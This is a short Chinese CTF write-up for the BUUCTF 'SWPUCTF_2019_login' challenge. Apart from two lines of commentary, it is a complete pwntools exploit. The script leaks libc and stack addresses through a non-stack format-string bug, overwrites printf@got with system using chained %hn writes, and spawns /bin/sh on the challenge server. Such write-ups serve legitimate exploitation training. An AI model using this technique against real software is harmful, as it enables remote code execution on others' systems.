BUU-SWPUCTF_2019_login-WP
本来想改返回地址的,但是发现不论是one_gadget还是system都出现了dump core,据说是32位程序这样改返回地址很容易爆,我也不知道为什么。最后还是覆写的printf@got。
没有新知识,就是非栈上的格式化字符串。
exp
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#context(log_level = 'debug')
#sh = process("./SWPUCTF_2019_login")
sh = remote("node3.buuoj.cn",28692)
libc = ELF("./libcs/libc-2.27.so")
sh.sendlineafter("name: \n",'pwn')
payload = "%15$p"
sh.sendlineafter("password: \n",payload)
sh.recvuntil("password: ")
libc_base = int(sh.recvuntil("\n",drop = True),base = 16)
libc_base = libc_base - (libc.symbols["__libc_start_main"] + 241)
log.success("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.symbols["system"]
log.success("system_addr:" + hex(system_addr))
printf_got = ELF("./SWPUCTF_2019_login").got["printf"]
log.success("printf@got:" + hex(printf_got))
payload = "%6$p"
sh.sendlineafter("again!\n",payload)
sh.recvuntil("password: ")
stack_addr = int(sh.recvuntil("\n",drop = True),base = 16) - 0x10
log.success("stack_addr:" + hex(stack_addr))
payload = "%" + str((stack_addr + 4) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str(printf_got & 0xffff) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((stack_addr + 6) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str(printf_got >> 16) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((stack_addr + 8) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((printf_got + 2) & 0xffff) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((stack_addr + 10) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((printf_got + 2) >> 16) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str(system_addr & 0xffff) + 'c' + "%7$hn"
payload += "%" + str((system_addr >> 16) - (system_addr & 0xffff)) + 'c' + "%8$hn"
print payload
sh.sendlineafter("again!\n",payload)
sh.sendlineafter("again!\n","/bin/sh")
sh.interactive()